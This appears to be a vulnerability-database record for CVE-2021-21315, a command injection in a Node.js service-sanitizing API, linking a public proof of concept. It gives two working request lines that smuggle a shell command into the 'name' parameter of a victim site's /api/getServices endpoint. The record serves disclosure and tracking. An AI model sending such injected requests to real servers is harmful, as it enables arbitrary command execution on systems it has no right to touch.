{"uuid": "53f33ae0-1eb1-447a-82ef-cddfc054e9dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-21315", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/2821", "content": "#exploit\nCVE-2021-21315:\nNode.JS OS sanitize service Parameters Command Injection \nhttps://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC\nPoC:\n[Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt) [Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)", "creation_timestamp": "2021-10-28T05:17:06.000000Z"}